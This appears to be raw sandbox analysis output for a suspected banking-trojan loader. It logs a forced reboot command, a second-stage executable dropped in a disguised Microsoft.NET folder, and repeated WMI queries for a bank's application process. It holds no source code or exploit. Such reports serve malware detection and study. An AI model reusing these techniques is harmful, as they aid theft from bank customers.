Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'

Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: leg#U00edvel9931-009-140.08372236.exe

ReversingLabs: Detection: 21%

Source: leg#U00edvel9931-009-140.08372236.exe	String found in binary or memory: _cgo_pthread_key_created missingruntime: sudog with non-nil elemruntime: sudog with non-nil nextruntime: sudog with non-nil prevruntime: mcall function returnedruntime: newstack called from g=runtime: stack split at bad timepanic while printing panic valueruntime: setevent failed; errno=runtime.semasleep wait_abandonedframe_windowupdate_zero_inc_connaccess-control-allow-credentialsread limit of %d bytes exhausted: day-of-year does not match daybufio: invalid use of UnreadBytebufio: tried to fill full buffersync: Unlock of unlocked RWMutexsync: negative WaitGroup counter28421709430404007434844970703125MapIter.Value called before Next" not supported for cpu option "chacha20poly1305: bad key lengthtls: unknown Renegotiation valuetls: NextProtos values too largego package net: hostLookupOrder(mime: expected token after slashresource temporarily unavailablesoftware caused connection abortnumerical argument out of domainCertAddCertificateContextToStoreCertVerifyCertificateChainPolicyuse of closed network connectionGetVolumePathNamesForVolumeNameWed25519: bad public key length: x509: unsupported elliptic curvex509: invalid constraint value: x509: malformed subjectPublicKeyx509: cannot parse rfc822Name %qx509: ECDSA verification failurecrypto/aes: input not full blockcrypto/des: input not full blockcrypto/ecdh: invalid private keyunexpected character, want coloninput overflows the modulus sizeinteger is not minimally encodedcannot represent time as UTCTimechacha20: invalid buffer overlapslice bounds out of range [%x:%y]base outside usable address spaceruntime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativetoo many concurrent timer firingsruntime: name offset out of rangeruntime: type offset out of rangepseudo header field after regularhttp: invalid Read on closed Bodynet/http: skip alternate protocolinvalid header field value for %qpad size larger than data payloadframe_pushpromise_promiseid_shorthttp2: invalid pseudo headers: %vconnection not allowed by rulesetinvalid username/password versionunsupported transfer encoding: %qrelease of handle with refcount 0bytes.Buffer.Grow: negative countskip everything and stop the walksync: RUnlock of unlocked RWMutexleafCounts[maxBits][maxBits] != n142108547152020037174224853515625710542735760100185871124267578125reflect: slice index out of range of method on nil interface valuereflect: Fi
Source: leg#U00edvel9931-009-140.08372236.exe	String found in binary or memory: _cgo_pthread_key_created missingruntime: sudog with non-nil elemruntime: sudog with non-nil nextruntime: sudog with non-nil prevruntime: mcall function returnedruntime: newstack called from g=runtime: stack split at bad timepanic while printing panic valueruntime: setevent failed; errno=runtime.semasleep wait_abandonedframe_windowupdate_zero_inc_connaccess-control-allow-credentialsread limit of %d bytes exhausted: day-of-year does not match daybufio: invalid use of UnreadBytebufio: tried to fill full buffersync: Unlock of unlocked RWMutexsync: negative WaitGroup counter28421709430404007434844970703125MapIter.Value called before Next" not supported for cpu option "chacha20poly1305: bad key lengthtls: unknown Renegotiation valuetls: NextProtos values too largego package net: hostLookupOrder(mime: expected token after slashresource temporarily unavailablesoftware caused connection abortnumerical argument out of domainCertAddCertificateContextToStoreCertVerifyCertificateChainPolicyuse of closed network connectionGetVolumePathNamesForVolumeNameWed25519: bad public key length: x509: unsupported elliptic curvex509: invalid constraint value: x509: malformed subjectPublicKeyx509: cannot parse rfc822Name %qx509: ECDSA verification failurecrypto/aes: input not full blockcrypto/des: input not full blockcrypto/ecdh: invalid private keyunexpected character, want coloninput overflows the modulus sizeinteger is not minimally encodedcannot represent time as UTCTimechacha20: invalid buffer overlapslice bounds out of range [%x:%y]base outside usable address spaceruntime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativetoo many concurrent timer firingsruntime: name offset out of rangeruntime: type offset out of rangepseudo header field after regularhttp: invalid Read on closed Bodynet/http: skip alternate protocolinvalid header field value for %qpad size larger than data payloadframe_pushpromise_promiseid_shorthttp2: invalid pseudo headers: %vconnection not allowed by rulesetinvalid username/password versionunsupported transfer encoding: %qrelease of handle with refcount 0bytes.Buffer.Grow: negative countskip everything and stop the walksync: RUnlock of unlocked RWMutexleafCounts[maxBits][maxBits] != n142108547152020037174224853515625710542735760100185871124267578125reflect: slice index out of range of method on nil interface valuereflect: Fi
Source: leg#U00edvel9931-009-140.08372236.exe	String found in binary or memory: failed to construct HKDF label: %stoo many references: cannot spliceSetFileCompletionNotificationModesunexpected runtime.netpoll error: CM_Get_Device_Interface_List_SizeWcrypto/rsa: missing public modulusadding nil Certificate to CertPoolx509: unknown public key algorithmx509: invalid certificate policies%s %q is excluded by constraint %qx509: Ed25519 verification failurex509: unhandled critical extensioncrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapinvalid padding bits in BIT STRINGGODEBUG sys/cpu: can not disable "chacha20: wrong HChaCha20 key sizepersistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freefailed to get or create weak handleattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlineNtCreateWaitCompletionPacket failedfindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=http: server closed idle connectionCONTINUATION frame with stream ID 02006-01-02T15:04:05.999999999Z07:00executable file not found in %PATH%hash/crc32: invalid hash state sizeflate: corrupt input before offset 1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9reflect.MakeSlice of non-slice typeunsupported signature algorithm: %vtls: too many non-advancing recordstls: server selected an invalid PSKtls: invalid Kyber server key sharemime: bogus characters after %%: %qhpack: invalid Huffman-encoded datadynamic table size update too largenetwork dropped connection on resettransport endpoint is not connectedfile type does not support deadlineSubscribeServiceChangeNotificationsbigmod: modulus is smaller than natx509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accessmlkem768: invalid ciphertext lengthcrypto/md5: invalid hash state sizetoo many Questions to pack (>65535)'_' must separate successive digitsP224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitysuperfluous leading zeros in lengthchacha20: output smaller than inputtransform: short destination bufferlfstack node allocated from the heap) is larger than maximum page size (runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnable
Source: leg#U00edvel9931-009-140.08372236.exe	String found in binary or memory: failed to construct HKDF label: %stoo many references: cannot spliceSetFileCompletionNotificationModesunexpected runtime.netpoll error: CM_Get_Device_Interface_List_SizeWcrypto/rsa: missing public modulusadding nil Certificate to CertPoolx509: unknown public key algorithmx509: invalid certificate policies%s %q is excluded by constraint %qx509: Ed25519 verification failurex509: unhandled critical extensioncrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapinvalid padding bits in BIT STRINGGODEBUG sys/cpu: can not disable "chacha20: wrong HChaCha20 key sizepersistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freefailed to get or create weak handleattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlineNtCreateWaitCompletionPacket failedfindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=http: server closed idle connectionCONTINUATION frame with stream ID 02006-01-02T15:04:05.999999999Z07:00executable file not found in %PATH%hash/crc32: invalid hash state sizeflate: corrupt input before offset 1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9reflect.MakeSlice of non-slice typeunsupported signature algorithm: %vtls: too many non-advancing recordstls: server selected an invalid PSKtls: invalid Kyber server key sharemime: bogus characters after %%: %qhpack: invalid Huffman-encoded datadynamic table size update too largenetwork dropped connection on resettransport endpoint is not connectedfile type does not support deadlineSubscribeServiceChangeNotificationsbigmod: modulus is smaller than natx509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accessmlkem768: invalid ciphertext lengthcrypto/md5: invalid hash state sizetoo many Questions to pack (>65535)'_' must separate successive digitsP224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitysuperfluous leading zeros in lengthchacha20: output smaller than inputtransform: short destination bufferlfstack node allocated from the heap) is larger than maximum page size (runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnable
Source: leg#U00edvel9931-009-140.08372236.exe	String found in binary or memory: C:/Program Files/Go/src/net/addrselect.go
Source: leg#U00edvel9931-009-140.08372236.exe	String found in binary or memory: C:/Users/Administrator/Documents/Loaders/TempGo-leg

Source: unknown	Process created: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe "C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe"
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	Process created: C:\Windows\System32\shutdown.exe shutdown /r /t 30
Source: C:\Windows\System32\shutdown.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe "C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe"
Source: unknown	Process created: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe "C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe"
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	Process created: C:\Windows\System32\shutdown.exe shutdown /r /t 30	Jump to behavior

Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\shutdown.exe	Section loaded: shutdownext.dll	Jump to behavior
Source: C:\Windows\System32\shutdown.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: classiciedll_64.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: magnification.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: d3d9.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
